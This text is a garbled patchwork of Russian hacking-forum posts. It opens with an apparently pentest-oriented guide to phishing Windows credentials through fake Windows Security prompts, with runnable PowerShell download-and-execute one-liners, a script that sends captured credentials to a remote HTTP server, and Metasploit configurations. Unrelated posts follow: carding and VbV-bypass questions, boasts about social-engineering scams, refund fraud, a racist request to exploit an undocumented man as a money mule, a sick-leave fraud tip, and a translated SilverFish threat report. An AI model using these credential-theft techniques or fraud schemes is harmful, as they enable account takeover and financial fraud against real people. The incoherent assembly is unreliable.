Каждый введенный пользователем символ перехватывается, пока не будет выявлен весь пароль целиком. Стоит, однако, отметить, что данная утилита не выполняет проверку подлинности пароля и будет снифить все, что пользователь введет в поле пароля.
SharpLocker — фишинг пароля
Запросы учетных данных со стороны службы безопасности Windows очень распространены, поскольку ПО в корпоративной среде может регулярно требовать дополнительное подтверждение действий или переавторизацию. Microsoft Outlook, например, один из ярчайших представителей такого ПО, которое постоянно запрашивает у пользователей доменные учетные данные.
1. Утилита, которая маскируется под окно запроса со стороны безопасности Windows называется CredsLeaker. Для ее корректной работы требуется web-сервер, с которого она будет получать все необходимые файлы и куда будет сохранять учетные данные пользователей, а также наличие PowerShell, чтобы отправлять HTTP запросы на свой сервер. Все команды в дальнейшем будут выполнены из имеющегося в составе BAT-файла.
CredsLeaker — HTTP Delivery
Перед запуском run.bat-файла необходимо внести все необходимые изменения в конфигурационные файлы утилиты. Как только run.bat файл будет запущен, пользователь увидит окно Windows Security с запросом его учетных данных.
CredsLeaker — окно фишинга
Окно с запросом исчезнет, только если будут введены валидные учетные данные пользователя. Домен, имя компьютера, имя пользователя и пароль будут сохранены в файле creds.txt по указанному ниже пути:
/var/www/html/creds.txt
CredsLeaker — вывод в файл creds.txt
2. Matt Nelson разработал PowerShell скрипт, который вызывает окно запроса учетных данных Windows Security с последующей проверкой их валидности. Данное окно также не может быть закрыто пользователем, пока не будут введены актуальные учетные данные. Этот скрипт может быть выполнен удаленно, а введенные учетные данные будут отображены в консоли на машине «злоумышленника»:
Code:Copy to clipboard
powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-LoginPrompt.ps1')); Invoke-LoginPrompt
Invoke-LoginPrompt — удаленный вызов
Invoke-LoginPrompt — окно фишинга
3. В составе Nishang framework тоже имеется [PowerShell- скрипт](https://github.com/samratashok/nishang/blob/master/Gather/Invoke- CredentialsPhish.ps1), который создает фейковое окно запроса учетных данных пользователя.
Code:Copy to clipboard
Import-Module C:\Invoke-CredentialsPhish.ps1
Invoke-CredentialsPhish
Invoke-CredentialsPhish — локальный вызов и окно фишинга
Сгенерированное окно будет содержать информацию о том, что на выполнение данного действия требуется подтверждение в виде ввода учетных данных. Более опытные в плане ИБ пользователи могут заподозрить, что данное окно вызвано запуском некоего приложения в фоне, однако в корпоративной сети далеко не все могут обладать этими знаниями. Учетные данные, которые пользователь введет в диалоговом окне, будут отображены в консоли.
Invoke-CredentialsPhish — вывод собранных данных
Данный скрипт также может быть запущен удаленно:
Code:Copy to clipboard
powershell.exe -ep Bypass -c IEX ((New-Object Net.WebClient).DownloadString('http://10.10.0.5/Invoke-CredentialsPhish.ps1)); Invoke-CredentialsPhish
Rob Fuller в своем блоге описал атаку по фишингу учетных данных пользователя с использованием Metasploit и PowerShell. Metasploit Framework располагает в своем составе модулями, которые могут захватывать учетные данные пользователей из различных протоколов (FTP, SMB, HTTP и др.). Указанный ниже модуль используется для развертывания базового HTTP сервера с аутентификацией:
Code:Copy to clipboard
use auxiliary/server/capture/http_basic
set URIPATH /
PowerShell применяется для проведения атаки по фишингу учетных данных пользователя посредством генерации окна запроса Windows Security с последующей передачей собранных учетных данных на HTTP сервер, созданный ранее через Metasploit:
Code:Copy to clipboard
$cred = $host.ui.promptforcredential('Failed Authentication','',[Environment]::UserDomainName + "\" + [Environment]::UserName,[Environment]::UserDomainName);[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true};
$wc = new-object net.webclient;
$wc.Headers.Add("User-Agent","Wget/1.9+cvs-stable (Red Hat modified)");
$wc.Proxy = [System.Net.WebRequest]::DefaultWebProxy;
$wc.Proxy.Credentials = [System.Net.CredentialCache]::DefaultNetworkCredentials;
$wc.credentials = new-object system.net.networkcredential($cred.username, $cred.getnetworkcredential().password, '');
$result = $wc.downloadstring('http://10.10.0.5/');
Для изначального захвата учетных данных требуется использовать кодировку UTF-16LE с последующим конвертированием в Base64:
Code:Copy to clipboard
cat popup.txt | iconv -t UTF-16LE
cat popup.txt | iconv -t UTF-16LE | base64 -w0
Конвертация кода в Base64
Выполнение указанного кода, локально или удаленно, приводит к появлению у пользователя окна запроса на авторизацию якобы со стороны Windows Security.
Code:Copy to clipboard
powershell.exe -ep bypass -enc <base64>
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fdg%2Fji%2Fuc%2Fdgjiuc2_v-
smcu8ib6xkqvpw8by.jpeg&hash=359678d4b8b321b7f8d4b0cc5fbe9e3d)
Окно фишинга учетных данных
Модуль Metasploit получит учетные данные сразу после ввода со стороны пользователя.
Metasploit HTTP Server — получение учетных данных
Metasploit Framework имеет в своем составе модуль, способный самостоятельно вызвать фейковое окно с запросом авторизации Windows Security со стороны практически любого процесса в системе. Для корректной работы данного модуля требуется указать рабочую meterpreter сессию и процесс, от имени которого будет вызван фейковый запрос авторизации Windows Security.
Code:Copy to clipboard
use post/windows/gather/phish_windows_credentials
set SESSION 3
set PROCESS *
run
Metasploit Module — конфигурация
В данном случае символ * указывает модулю, чтобы он выполнял мониторинг всех процессов, которые запущены от имени системы (NT Authority\System), и вызвал диалоговое окно в тот момент, когда в системе будет запущен новый процесс от имени системы.
Metasploit Module — мониторинг по всем процессам
Как только новый процесс запустится, пользователю будет выдано диалоговое окно от имени данного процесса с запросом авторизации для якобы подтверждения дальнейшей работы.
Metasploit Module — окно фишинга
Как только пользователь введет учетные данные, они сразу же будут отображены в консоли Metasploit.
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2F_p%2Flz%2Fh-%2F_plzh-
pkr7thf4ayeeszt8f-jgk.jpeg&hash=88925e4f841e65e403f12ff952ab6d5f)
Metasploit Module — получение учетных данных
Также данный модуль может быть настроен на ожидание запуска конкретного процесса.
Metasploit Module — получение учетных данных через процесс notepad.exe
Lockphish — это еще одна утилита, которая способна выполнить фишинговую атаку с подменой окна входа в систему Windows. Темплейт окна входа в систему хранится на PHP-сервере и по умолчанию использует YouTube, чтобы выполнить редирект пользователя после ввода логина и пароля.
Code:Copy to clipboard
bash lockphish.sh
![](/proxy.php?image=https%3A%2F%2Fhabrastorage.org%2Fwebt%2Fze%2F1t%2F5t%2Fze1t5ti-
aur00jjhmyizwiblek8.jpeg&hash=da02f40db8f519301f978bf4b5505894)
LockPhish — запуск
На данном этапе потребуется прибегнуть к помощи социальной инженерии, чтобы заманить пользователя на веб-сайт, где расположены файлы экрана блокировки.
LockPhish — скачивание файла
В отличие от всех остальных утилит, расположение элементов на данном экране блокировки может быть не точным, запрос на авторизацию будет выведен от имени Администратора, а не от имени текущего аккаунта пользователя, а внешне окно блокировки стилизовано под Windows 10 Lockscreen. Все это в комплексе может очень сильно насторожить пользователя. Данная утилита также не имеет механизмов валидации введенного пароля.
LockPhish — экран блокировки
После того, как пользователь выполнит ввод учетных данных, будет выполнен редирект на веб-сайт youtube.com.
LockPhish — редирект
Учетные данные будут отображены в консоли.
LockPhish — собранные учетные данные
Представленные в статье методы будут эффективны, если пентестеру уже удалось закрепиться в системе (получить стабильную точку входа), но повысить привилегии или получить учетные данные пользователей другим путем не получается. При проведении подобных фишинговых атак, следует очень тщательно подбирать целевую аудиторию. Эффективность будет в разы выше, если целью окажутся наименее IT-грамотные сотрудники организации.
Автор Том Хантер
t.me/tomhunter
Что расскажут о человеке его слова-паразиты?
Практически о каждом человеке можно узнать все, просто прислушавшись к его речи. Да, походка, мимика и реакция на определенные обстоятельства также много значат в искусстве чтения характера, но только разговор определенной личности выдаст окружающим то, что она так старательно замалчивает.
Если поконкретнее, то употребляемые каждым человеком слова-паразиты являются
не просто способом скрепления выражений, но и своеобразной лакмусовой
бумажкой, проявляющей качества, достоинства и недостатки характеров. Итак, что
же скрывают за собой такие распространенные и якобы безобидные слова-паразиты?
«Кстати» — это слово употребляют в повседневной своей речи все те люди,
которым не хватает внимания.
Они могут ощущать неловкость в незнакомой компании, и поэтому и прикрывают
свое смущение этим словом.
Вслушайтесь в чей-нибудь разговор и посмотрите, какое внимание людей сразу
привлекает человек, начинающий свою речь со слова «кстати».
«Короче» — показатель торопливости, нервозности и агрессии.
Чаще всего этим словом пользуются люди с холерическим типом темперамента.
Некоторых из них можно с уверенностью причислять к признакам неуравновешенной
нервной системы. Можно встретить также часто употребление этого слова у людей
болтливых и не умеющих справляться с этим своим качеством.
«Это самое» часто говорят те люди, которым лень исполнять свою работу и свои
домашние обязанности.
Они могут быть ненадежны и импульсивны, так что на них нельзя слишком сильно
надеяться. А еще подобные личности ловко избегают наказаний, вовремя сваливая
свою вину на ближайших подходящих для этого жертв.
«Вообще-то» — еще одно слово из ежедневного лексикона неуверенных в себе
людей.
Но, в отличие от «кстати», эти личности обладают завидным талантом закатывать
скандалы буквально на ровном месте. Правда, делают они так по причине той же
неуверенности в себе.
«На самом деле» проскакивает в разговорах самоуверенных и эгоистичных людей.
Они доверяют только своему опыту и своему мнению, а все остальное их просто не
интересует. Как правило, человек-«на самом деле» тяжело заводит друзей и
завязывает отношения, потому что считает себя одного единственным и
неповторимым. Другие же люди – это просто публика для его жизненных
выступлений.
«Типа» и «Значит» любят повторять настоящие консерваторы.
Они против всего нового и правоту своего мнения всегда могут доказать
агрессивным отношением к собеседнику.
«Как бы» — это признак творческой натуры, которая часто проводит время в своем
выдуманном мире.
Именно этим словосочетанием такие люди неосознанно подчеркивают свою
оторванность от социума и всю относительность каждого события в собственной
жизни.
«Просто» часто произносят в речи те люди, мнение которых не бывает
самостоятельным.
Они зависят от своего окружения, и бояться взять на себя хоть какую-то
ответственность. А еще они часто оправдываются, чем окончательно «роняют» себя
в глазах знакомых людей.
На эмуляторах не работает!
Совсем недавно в вконтакте появились мини-приложения , которые платят за
просмотр рекламы.
Я наткнулся на одно из таких приложений. Просто тыкаешь и смотришь рекламные
видео до 30 секунд.
Есть режим автопросмотра , но он работает плохо и слетает после 15-20
рекламных видео.
Я начал думать , как можно полностью автоматизировать процесс просмотра. В
голову сразу пришёл АВТОКЛИКЕР.
Теперь перейдём конкретно к схеме. Что нам понадобится :
Приступим.
Приветствую всех кто увидел мою тему, а не так давно начал увлекаться и читать
темы по поводу Кардинга.
Недавно наткнулся на систему VbV(Verified by Visa), и там рассказывали о том
что лучше такие сс обходить и искать NoVbv.
Но недавно в канале тг услышал что якобы такую систему обходят, вот и хотел
изнать может кто знает как?
Информация нужна для общего понимания. Огромное спасибо тем, кто отзоветься.
Для решения проблемы человеку, прежде всего, необходимо понять, что он не уникален, и миллионы живут с точно такими же трудностями, считает автор книги «Тонкое искусство пофигизма: парадоксальный способ жить счастливо» Марк Мэнсон. Он пишет: «Ощущаете себя хреново? Наплюйте на это». Тогда, «словно по взмаху волшебной палочки (палочки-на фиг-посылалочки)», ваша жизнь изменится.
Мэнсон в свое книге объясняет, как перестать завидовать другим, избавиться от завышенных ожиданий и разобраться, что действительно для вас важно. Вот несколько ярких выдержек, которые покажут мир эмоций, переживаний и проблем несколько с другой стороны.
Решил написать статью про СИ и уделить ей особое внимание. Статья подойдёт к прочтению как новичкам, так и старичкам. Многие в действительности не совсем правильно понимают зачем нужно развивать социальную инженерию, считают, что она нужна исключительно для развода людей. Отчасти это правда, но тут есть и свои тонкости с разными нюансами.
1.) С помощью СИ можно добиться от человека того чего хотите Вы, естественно если Ваш навык в этом деле намного выше. Можно развести как любую девушку на секс, так и олигарха на ролс ройс и домик на мальдивах, который даже не догадается, что Вы его развели.
2.) С помощью СИ можно сделать свой легальный бизнес, создать ОЧЕНЬ хорошую рекламу и впаривать всякий ненужный хлам под видом кремов для увеличения члена, чаёв для похудания, спинеров и прочей лабуды, причём если организовать всё хорошо, то огромными партиями с милиоными профитами, даже в очень конкурентном бизнесе с этим можно обогнать сильных конкурентов. Можно стать гадалкой, колдуном или основать новую секту прикинувшись пророком. Или если Вы школьник можно впарить даже свои школьные тетрадки, заношенные джинсы, давно ненужные и запылившиеся плееры и мобилы, купить на них пивко и сижек с ягой.
3.) С помощью СИ можно найти хорошие связи и Вас устроят на хорошую белую работу или в серую, чёрную команду с опытными людьми, даже если вы почти ничего не умеете. Просто Вы будете "другом" одного из этих ребят и он за Вас поручится .
4.) С помощью СИ можно получить что угодно, тут нет пределов. Самое главное, это даже не получить желаемое, лично для меня социальная инженерия это постоянное совершенствование своего навыка с каждым предметом что получил, будь то деньги, признание, или какую-либо эмоцию, а самое главной опыт. ("В самой основе СИ заложен потенциал бескорыстного своеволия, свойственный, скорее, искусству. Важны виртуозность, мастерство, оригинальность самовыражение - и не ради каких-либо краткосрочных целей наподобие наполнения карманов. Основная цель, совершенствовать свои навык" - цитата не моя, из какой-то книги или фильма уже не помню).
5.) С помощью СИ даже если так случится и Вы окажетесь на дне , попадя на зону можно стать не последним человеком и не спать у параши , став бомжом стать их предводителем и посылать своих "спамеров" таскать Вам бутылки с водярой и железо на сдачу металоллома, или посадить их попрошайничать и получать свой % (ну это перебор походу, куда меня фантазия занесла, хотя в жизни всякое бывает). Если Вы упадёте и у Вас есть навык, то всегда подниметесь, даже с самой глубокой ямы.
6.) С помощью СИ можно соблазнить опять же таки любую девушку даже если Вы без денег, а она будет встречаться с мажором или какинибудь богатеньким мамонтом, которая потом же сама его кинет и передаст часть его бабок Вам, если Вы того захотите, ну, а можете просто жениться и стать альфонсом, тут уж решать Вам.
7.) С помощью СИ можно провернуть любое дело каким бы сложным оно не было. Спокойно можно впарить участок на солнце и сказать, что вашего мамонта там похонят после смерти(многие люди настолько тупые, что даже не знают, что солнце это звезда, а не планета), ну или впарить эйфелеву башню (были такие случаи в истории).
8.) С помощью СИ можно стать хорошим политиком и продвинуться во власть с нуля до самых вершин(Таких примеров хватает в истории: тот же Гитлер в 24 года спал на скамейках по улицам и продавал почтовые марки на конверты, которые рисовал лично, лишь бы хватило на еду, но обожал риторику и ораторство, и ему это очень помогло)
9.) С помощью СИ..... можно бесконечно перечислять все плюсы, тут нет ни одного минуса.
Можно стать хакером и ломать компы, но взломать человека в несколько раз проще. ("Самое уязвимое - это люди"- цитата Митника вроде, у него кстате годные книги очень, новички можете почитать).
Несколько советов: изучайте актёрское мастерство, читайте книги по этой тематике, практикуйтесь. Если не знаете где практиковаться и вы законопослушный человек белее некуда (это не шутка про расизм если что xD), то начните хотябы с мелочи. Стреляйте сигареты каждый день у 10 прохожих. В первый день получится стрельнуть у 1, через неделю стабильно 3, ну а потом возможно и 10 из 10, тут главное уверенность и вера в свои силы.
Ребят, всем здарова. Как-то раз, кореш просил научить его рефам, т.к. у меня довольно неплохой опыт в этой теме) Но мы в реале незнакомы, я писал ему приват статейки. Сейчас подумал, почему бы мне не сделать телеграм канал и чат, в котом я буду искать единомышленников и обучать новичков.
За своё время, я рефал как паленые х#йни за тысячу рублей, так и телефоны ценой 20к+. Видел самых разных китайцев, которые пытались меня наеб@ть, видел разную тех. поддержку, бывали даже случаи, когда меня просили отменить спор и доплачивали мне бабок сверху за его отмену))
Вообще просто в последний год никак не могу найти свою нишу. Мне очень нравятся рефы, но не считаю что в них как-то преуспел. И нет, я не про то что у меня всё в них херово, и я иду обучать)))
Нет, дело в том, что я хочу оставить за собой что-то большее чем просто работать для себя. Я вам больше скажу, я за своё время, ни разу не проиграл ни одного спора, правда. Но хотелось бы иметь своё окружение, и воспитанников в этой нише. Я порой просто поверить не могу, что кто-то учит рефу за какие-то космические деньги, или рефает людям за процент. Пхаэаэа, ребяяят)) Это всё полная х#йня, я хочу перевернуть весь этот рынок инфоцыган и показать кто тут уровень.
Но просто дело в том, что я не совсем уверен, что это хоть кому-то действительно нужно. Напишите пожалуйста в комментарии, будет ли у вас интерес к этому. Если да, то я скоро начну выкладывать сюда свои статьи.
Вообщем сломал голову, собственно сабж: есть черный человек. живет в России много лет. знает язык, даже сидел. доков у него нет никаких, потерял, как его можно использовать и в какой теме? что можно придумать? как дропа или как? Только без приколов. Подскажите тему куда можно прикрутить чернокожего в какую тему чтобы поднять лаве. И собственно есть с ним тема: у него есть много желающих негритосов кто хочет жениться или выйти замуж за русских и получить внж и временную прописку за копеечку, если есть предложения то пишите
Сейчас больничный лист можно бесплатно получить, звонишь на горячую линию, говоришь что общался с человеком у которого положительный тест на ковид. Получаешь две недели самоизоляции.
Привет, можете подсказать как отбработать лог допустим с запросом Blockchain,
та или даже с обычной палкой (Paypal).
Желательно отписать об этом в личку здесь либо в телеграм.
Смогу заплатить за хорошую информацию
1. Введение
Команда PRODAFT Threat Intelligence (PTI) обнаружила очень изощренную группу киберпреступников, нацеленных исключительно на крупные корпорации и государственные учреждения по всему миру, с акцентом на ЕС и США. Несмотря на то, что мы воздерживаемся от какой-либо атрибуции, мы твердо верим, что этот случай станет важным эталоном с точки зрения понимания возможностей APT хакеров, их RoE, операций и TTP. Отчет прольет свет на одну из самых известных киберпреступных организаций в истории [16], [11].
В этом отчете мы смогли проанализировать различные серверы и образцы, что позволило нам связать группу SilverFish с печально известными атаками SolarWinds, которые стали достоянием общественности примерно в декабре 2020 года [3]. Более того, команда PTI обнаружила, что те же самые серверы использовались EvilCorp [17], которая модифицировала инфраструктуру TrickBot с целью крупномасштабной кампании кибершпионажа. Известно, что EvilCorp отвечает за разработку и распространение вредоносных программ Dridex [23] и WastedLocker [6].
Хотя было опубликовано множество статей и технических отчетов об атаках SolarWinds и группе EvilCorp [18], [9], [21], [16], [1], следует отметить, что этот отчет является первым отчетом, в котором основное внимание уделяется о находках "в тылу врага". Поэтому в этом отчете мы представляем результаты анализа инфраструктуры групп, которые, по нашему мнению, помогут другим исследователям понять техническую сложность атак группы SilverFish и выявить аналогичные закономерности в будущем. Этот отчет содержит результаты работы C&C сервера, статистику команд, даты заражения, целевые секторы и страны, инструменты, использованные во время атак, выполненные команды и другую информацию о группах TTP.
Отчет структурирован следующим образом: В следующем подразделе (1.1) мы представляем график нашего расследования. В Разделе 2 мы приводим краткое изложение нашего исследования. В Разделе 3 проводится всесторонний технический анализ атак для определения мотивации, возможностей и предыстории группы. В Разделе 4 мы предлагаем несколько статистических данных о кампании атаки. В разделе 5 мы завершаем некоторые рекомендации для будущих исследований. В конце отчета также приводятся IOC и ссылки. (См. Раздел 6)
Обратите внимание, что этот отчет имеет две версии. "Приватный релиз" предоставляется правоохранительным органам, действующим CERTS/CSIRTS и членам нашего U.S.T.A. Threat Intel Platform (с соответствующими аннотациями и сокращениями). Аналогичным образом, "Публичный релиз" публично распространяется с целью продвижения глобальной борьбы с высококлассными злоумышленниками и APT, такие как SilverFish.
Click to expand...
Используются ли эти серверы для заражения жертв атаки SolarWinds?
Хотя это, вероятно, следует из наших наблюдений, наши исследования имеют другое направление. Цепочки-доставки содержит еще один вектор атаки, который не виден на отслеживаемых нами серверах. То, что мы наблюдали, является частью более крупной инфраструктуры, которая имеет прочные связи с индикаторами компрометации SolarWinds (индикаторы компрометации), которые используются тремя разными компаниями, упомянутыми в нашем отчете. Можно сделать вывод, что эти серверы, скорее всего, были задействованы в какой-то момент кампании.
Это связано с TrickBot?
Нет, наше исследование показывает только то, что группа SilverFish использует аналогичную версию инфраструктуры и кодовой базы TrickBot. Мы обнаружили доказательства того, что WastedLocker и многие TTP соответствуют только EvilCorp и серверам, связанным с атаками SolarWinds.
Кто атакующие? Вы можете их идентифицировать?
Хотя наши результаты показывают закономерности с известными атаками, мы не относим атаки к конкретным географическим зонам, типам организаций или лицам.
Как бы вы связали это с атаками SolarWinds?
Прежде всего, существует множество серверов, напрямую связанных с IOC от крупных корпораций, упомянутых в нашем отчете. Мы представили эти результаты, чтобы любой мог легко отследить их, используя обычные инструменты расследования. Во-вторых, мы видим, что из 4700 жертв существует значительное совпадение с компаниями, пострадавшими от атак SolarWinds. Список перекрывающихся жертв приведен в разделе 4.2.
Что, если ваша отправная точка (IOC, которые разделяют эти корпорации) неверна с самого начала?
Для точного исследования требуется прочный фундамент. Наша отправная точка основана на данных о IOC, о которых уже сообщали два независимых источника, которые также активно расследуют это дело. Если бы мы все были неправы, могли бы быть более тревожные сценарии. Мы могли бы говорить о более способной группе, которая взломала бы большинство перекрывающихся жертв с помощью отдельного метода.
Что случилось с жертвами и серверами C &C?
Мы разослали список жертв среди соответствующих CERT в их странах. Мы продолжаем делиться большим количеством IOC с некоторыми поставщиками глобальной информации об угрозах/сетевой безопасности, которые уже начали проводить свои собственные анализы и процедуры. По мере раскрытия и публикации дополнительной информации другими сторонами мы будем соединять точки, ведущие к идентификации группы SilverFish.
Что нового?
Команда PRODAFT Threat Intelligence (PTI) раскрыла глобальную кампанию кибершпионажа, которая имеет тесные связи с атакой SolarWinds. Группе PTI удалось исследовать командный и контрольный сервер группы и уведомить цели атак.
Почему это имеет значение?
Результаты этого отчета объясняют различные TTP операций злоумышленников, что иллюстрируется примерами, полученными непосредственно командой PTI. На сегодняшний день большая часть доступных данных по этим высокопрофессиональным делам основана на показателях, полученных от целевых жертв. Теперь можно будет подойти к делу с точки зрения противника.
Что нужно сделать?
В этом отчете представлены многие IOC, которые могут использоваться поставщиками кибербезопасности/группами реагирования на инциденты для сканирования своей сети и обнаружения любых зараженных машин. Особенно рекомендуется выполнять эти действия владельцам критически важных инфраструктур. Раздел этого отчета "Порядок действий" поможет правоохранительным органам адаптировать свои стратегии к аналогичным APT- угрозам в будущем.
**1.1 Хронология расследования
20 ДЕКАБРЯ**: После раскрытия информации об атаке SolarWinds в декабре 2020 года один из наших клиентов из финансового сектора отправил запрос на анализ от нашей службы поддержки США и запросила подробное расследование взлома. В рамках этого расследования; мы начали с публичных IOC, опубликованных FireEye [8]. На основе одного из доменов группа PTI смогла создать уникальный отпечаток одного из онлайн-серверов, используя несколько показателей.
На следующем этапе группа PTI провела глобальный поиск по всему диапазону IPv4, чтобы найти соответствующий отпечаток, что привело к положительным результатам обнаружения в течение 12 часов после сканирования. Объединив и интерпретируя эти выводы в отчет о корпоративном деле в том же месяце, мы предоставили нашему клиенту подробный отчет о деле и уведомили всех наших членов о том, что наше расследование будет продолжаться в гораздо большем масштабе. Подробности объяснены в Разделе 3.
21 ЯНВАРЯ : На более позднем этапе группа PTI обогатила свои данные отпечатков/идентификаторов и начала выполнять ретроспективные запросы к предыдущим глобальным сканированием IPv4, заархивированным из прошлых дел. Это стандартная практика для команды PTI, поскольку мы отслеживаем несколько громких APT-групп и ежедневно составляем внутренние отчеты в рамках операции TI U.S.T.A.
Примечание: согласно нашим внутренним журналам, серверы, которые использовались для C&C во время атак, были обнаружены нашей командой PTI примерно в ноябре 2020 года, но они были отмечены как имеющие среднее значение, поскольку в то время не было соответствующих отпечатков. Тем не менее, эти результаты начали пересматриваться в течение января 2021 года, и наши идентификаторы постоянно улучшаются.
Click to expand...
21 ФЕВРАЛЯ : Основываясь на наших выводах за предыдущие месяцы (с 20 ноября по 21 февраля), группа PTI выполнила окончательное сканирование, которое привело к ряду других фундаментальных выводов, подробности которых можно найти в Разделе 3. Команде PTI пришлось преодолеть различные технические проблемы, чтобы проанализировать и успешно деанонимизировать C&C серверы этой операции. В течение февраля 2021 года команда PTI работала над разными C&C серверами, чтобы полностью понять/идентифицировать мотивы злоумышленников. После каждого открытия создавались индивидуальные уведомления IOC, которые отправлялись членам платформы U.S.T.A. для быстрого исправления.
1–7 МАРТА 21 года : с начала марта 21 года;Команда PTI начала уведомлять потерпевших через правоохранительные органы, стратегических партнеров и CERTS/CSIRTS в регионах, на которые оказывает влияние SilverFish Group. Подробные IOC и краткие отчеты были опубликованы для всех соответствующих сторон в течение этого срока в качестве общественной ответственности. В каждом из этих уведомлений команда PTI проявляла крайнюю осторожность в отношении сохранения конфиденциальности и конфиденциальности каждой организации.
Дополнительное примечание: в ходе нашего исследования SilverFish были установлены различные партнерские отношения со всемирно признанными поставщиками аналитики угроз и частными группами IR, уведомляя их об определенных угрозах, которые могут представлять опасность для их клиентов.
Click to expand...
15 МАРТА : Заключительный отчет был одобрен нашим консультативным советом, а первоначальная приватная версия была передана Polcant (Отдел киберпреступности кантональной полиции - Швейцария) для взаимодействия с соответствующими правоохранительными органами.
17 МАРТА '21: 17 марта 2021 года команда PTI опубликовала "Публичную версию" отчета, чтобы прояснить ситуацию с несколькими организациями, которые по-прежнему являются мишенью SilverFish. На дату выпуска настоящего отчета; Хакеры SilverFish все еще используют соответствующие машины для этапов бокового перемещения своих кампаний. К сожалению, несмотря на наличие крупных критически важных инфраструктур, большинство их целей не знают о присутствии группы SilverFish в их сетях.
**2 Краткое содержание
2.1 Обзор**
В разделе "Краткое содержание" данного отчета приводится нетехническое описание группы SilverFish, которая, как было установлено, осуществила чрезвычайно изощренную кибератаку по меньшей мере на 4720 целей, включая, помимо прочего, гп правительственные учреждения, глобальные ИТ-провайдеры, авиационная промышленность и оборонные компании. Было обнаружено, что он имеет множественные связи с печально известным инцидентом SolarWinds в прошлом квартале и всемирно признанной группой EvilCorp, мы считаем, что это дело является важным краеугольным камнем с точки зрения понимания возможностей организованных злоумышленников. Обратите внимание, что все вопросы, упомянутые здесь, будут объяснены более подробно в следующих разделах этого отчета.
Этот отчет включает в себя различные открытия, связанные с чрезвычайно хорошо организованной группой кибершпионажа, которая, как считается, имеет прочные связи с печально известной Solarwinds, EvilCorp, которая поставила под угрозу несколько критических инфраструктур. Мы верим; Наши результаты выявят несколько ранее неизвестных инструментов, техник и процедур, связанных с одним из самые высокопрофессиональные APT-группы в истории.
2.2 Расследование группы PTI
После печально известной атаки SolarWinds, пик которой пришелся на декабрь 2020 года, команда PTI начала работу над несколькими первоначальными выводами из общедоступных ресурсов, связанными с раскрытием этой атаки [8], [19].
Группа SilverFish взломала различные критически важные организации. Мы смогли проверить всех жертв, которые публично признали/по слухам стали объектом атак SolarWinds, в панели C&C. Вот некоторые из наиболее заметных жертв:
• Трехбуквенное агентство США.
• Всемирно признанный военный подрядчик США.
• Не менее 5 ведущих мировых производителей ИТ и поставщиков решений.
• Множество ведущих автомобильных производственных групп из Европы.
• Множество авиационных и аэрокосмических компаний- производителей/исследовательских компаний.
• Десятки банковских учреждений из США и ЕС с миллионами клиентов
• Департаменты общественного здравоохранения из разных регионов
• Более трех полицейских сетей
• Несколько систем аэропорта в Европе
• Десятки государственных учреждений США, в том числе 3, которые уже признали взлом
• 3 из крупнейших в мире аудиторских/консалтинговых групп
• Не менее 4 всемирно признанных поставщиков ИТ-безопасности
• Всемирно признанная фармацевтическая компания.
• Глобальная организация, состоящая из 193 стран.
• Один из ведущих мировых производителей наборов для тестирования на COVID-19.
Click to expand...
После обнаружения онлайн-домена (databasegalore.сom) из ранее опубликованных IOC, команда PTI смогла продолжить анализ инцидента и найти еще не обнаруженные C&C серверы с помощью крупномасштабного сканирования сети.
Это позволило группе PTI получить доступ к инфраструктуре управления (т.к. к C&C серверу) группы SilverFish и получить дополнительную информацию о методах работы группы, включая, помимо прочего, IP-адреса и имена пользователей жертв, команды, выполняемые на машинах жертв, время активности группы SilverFish, комментарии, написанные для каждой жертвы, и приоритезацию операций.
**2.3 Характеристики SilverFish Group
Действую несколькими командами**: при первом просмотре сервера C&C команда PTI заметила, что на главной панели управления SilverFish C&C есть раздел под названием "Активные команды", включающий несколько комментариев, введенных разными группами пользователей, такими как Team 301, Команда 302 и так далее. Такой дизайн указывает на то, что эта инфраструктура предназначена для нескольких команд. Большинство комментариев, которые злоумышленники оставляют для каждой жертвы, в основном на английском и русском языках и включают городской сленг.
Расширенный набор навыков пост-эксплуатации: Выполненные команды и специально созданные сценарии, используемые группой SilverFish, убедительно свидетельствуют об изощренности и продвинутом наборе навыков пост- эксплуатации. После первоначального перечисления доменов жертв предпринимается несколько попыток перехода на внутренние системы критически важной инфраструктуры.
Исключительно нацелены на критически важные инфраструктуры в США и ЕС: После детальной проверки панели управления и контроля команда PTI увидела, что группа SilverFish выбрала исключительно целевой объект критической инфраструктуры. Почти все критические инфраструктуры (как это определено в NIST Cyber Security Framework [14]) были успешно скомпрометированы. Приблизительно половина жертв, согласно их публичным финансовым отчетам, были корпорациями, рыночная стоимость которых превышала 100 миллионов долларов США.
В то время как США, безусловно, являются наиболее часто поражаемым регионом, где зарегистрировано 2465 атак, за ними следуют европейские государства с 1645 жертвами из не менее чем 6 различных государств-членов.
Сосредоточены на разведке и скрытой передаче данных: проанализировав пользовательские скрипты и инструменты, созданные группой SilverFish, команда PTI пришла к выводу, что основной целью этой группы APT, скорее всего, является выполнение разведки и извлечение данных из целевых машин тайным образом.
Использование корпоративных жертв в качестве реальной "песочницы": группа PTI отметила, что группа SilverFish разработала беспрецедентную "песочниц" для обнаружения вредоносных программ, сформированную реальными корпоративными жертвами, которая позволяет злоумышленникам тестировать свои вредоносные полезные нагрузки на реальных живых серверах жертв c различными корпоративными решениями AV и EDR, что еще больше увеличивает вероятность успеха групповых атак SilverFish.
Работая во многом как VirusTotal, но с реальными живыми серверами жертв, эта платформа (которую мы называем VictimTotal 3.4) кампании SilverFish, как было замечено, включала два различных вредоносных файла, которые были ранее просканированы, под именами "buildus9_3.ps1" и "build_eu.ps1", указывающие на отдельную подготовку для разных регионов.
Высокоорганизованные рабочие шаблоны: Еще одним интересным открытием стал уровень иерархии на C&C сервере, позволяющий управлять разными целями, назначать эти цели разным группам и распределять поступающих жертв по соответствующим членам группы SilverFish. Дополнительную информацию об этой подробной структуре можно найти в Разделе 3.1.2, озаглавленном "Иерархия команды".
Работа в строгие смены: Как обсуждалось в п. 4.3, команда PTI также собрала данные о рабочих привычках группы SilverFish. При тщательном осмотре было обнаружено, что группа работала в соответствии с определенным графиком, а именно с 8:00 до 20:00 (всемирное координированное время). Кроме того, группа была более активна в будние дни с понедельника по пятницу.
